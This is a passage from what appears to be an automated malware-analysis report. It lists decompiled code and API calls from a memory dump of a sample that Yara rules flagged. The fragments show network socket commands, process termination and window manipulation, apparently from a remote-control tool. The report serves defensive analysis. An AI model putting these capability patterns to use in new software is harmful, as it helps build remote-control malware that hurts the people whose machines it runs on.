                                        				memset( &(_v68.style), 0, _t23 << 2);
                                        				asm("movsd");
                                        				asm("movsd");
                                        				asm("movsd");
                                        				asm("movsw");
                                        				_v68.cbSize = 0x30;
                                        				asm("movsb");
                                        				_v68.lpszClassName =  &_v20;
                                        				_v68.style = 0;
                                        				_v68.lpfnWndProc = E00413C3F;
                                        				_v68.cbClsExtra = 0;
                                        				_v68.cbWndExtra = 0;
                                        				_v68.lpszMenuName = 0;
                                        				if(RegisterClassExA( &_v68) == 0) {
                                        					L3:
                                        					return 0;
                                        				}
                                        				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                                        				if(_t21 == 0) {
                                        					GetLastError();
                                        					goto L3;
                                        				}
                                        				return _t21;
                                        			}

                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                        • CreateWindowExA.USER32 ref: 00413C29
                                        • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                        • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                        • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                        • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                          • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                          • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                          • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                        • atoi.MSVCRT ref: 004032E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                        Strings
                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                        • CurrentBuildNumber, xrefs: 004032BC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                        • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1453687294-3377751560
                                        • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                        • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                        • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                        • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004126EF(char _a4) {
                                        				void* _t2;
                                        				void* _t3;
                                        
                                        				_t1 =  &_a4; // 0x40e322
                                        				_t2 = GetCurrentProcess();
                                        				_t3 = GetCurrentThread();
                                        				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
                                        			}

                                        APIs
                                        • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                        • GetCurrentThread.KERNEL32 ref: 00412705
                                        • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                        • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Current$Process$DuplicateHandleThread
                                        • String ID: "@
                                        • API String ID: 3566409357-445313631
                                        • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                        • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                        • String ID:
                                        • API String ID: 901373779-0
                                        • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                        • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 1130490860-0
                                        • Opcode ID: 212030e5da73120c08e5f8d6a23c534ab92ffc11de8ac39be5ac21697676d5d1
                                        • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                        • Opcode Fuzzy Hash: 212030e5da73120c08e5f8d6a23c534ab92ffc11de8ac39be5ac21697676d5d1
                                        • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00405C62(void* __ecx) {
                                        				long _t7;
                                        				void* _t10;
                                        				void* _t18;
                                        				void* _t19;
                                        
                                        				_t18 = __ecx;
                                        				_t7 = CreateEventA(0, 0, 0, 0);
                                        				 *(_t18 + 0x34) = _t7;
                                        				if( *((char*)(_t18 + 0x3d)) != 0) {
                                        					_t10 = _t18 + 0x14;
                                        					do {
                                        						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
                                        						if(_t7 != 0) {
                                        							_t19 = _t19 - 0x10;
                                        							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        							E004020C2(0x41be70, 0x5a, _t10);
                                        							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        						}
                                        						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
                                        					} while ( *((char*)(_t18 + 0x3d)) != 0);
                                        				}
                                        				return 1;
                                        			}

                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                        • String ID:
                                        • API String ID: 2456067102-0
                                        • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                        • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 1435062097-0
                                        • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                        • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00409B39,69D8CB60), ref: 00412B5E
                                        • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                        • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                        • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                        • String ID:
                                        • API String ID: 788797586-0
                                        • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                        • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                        • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                        • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1622488342-0
                                        • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                        • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • closesocket.WS2_32(00000000), ref: 0040256A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                        • String ID:
                                        • API String ID: 3330461409-0
                                        • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                        • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E0040D817(void* __eflags) {
                                        				char* _t8;
                                        				void* _t25;
                                        
                                        				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
                                        				E004126BC( *(_t25 - 0x2c));
                                        				E0040EBBE();
                                        				E004017DD(_t25 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                        • atoi.MSVCRT ref: 0040D82E
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                          • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                          • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                          • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                        • String ID:
                                        • API String ID: 2919580351-0
                                        • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                        • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                        • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,69D65DF8), ref: 00412140
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@FileG@1@@ModuleNameV12@
                                        • String ID:
                                        • API String ID: 758954411-0
                                        • Opcode ID: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction ID: 88ce2cb358dffa7750e3bac2ad7a8a5a8ee651c39e1957481fcccb9e80397935
                                        • Opcode Fuzzy Hash: b21f42a26b2f103e63bea69b1fd2d22f01ac0b23dd7c23167616a2a11d239dfa
                                        • Instruction Fuzzy Hash: 51F0B77554050FEFDB00DB90ED49FED7778EB54309F1080A1F506A61A0EAB0AA49CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                        • atoi.MSVCRT ref: 0040E4B9
                                        • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
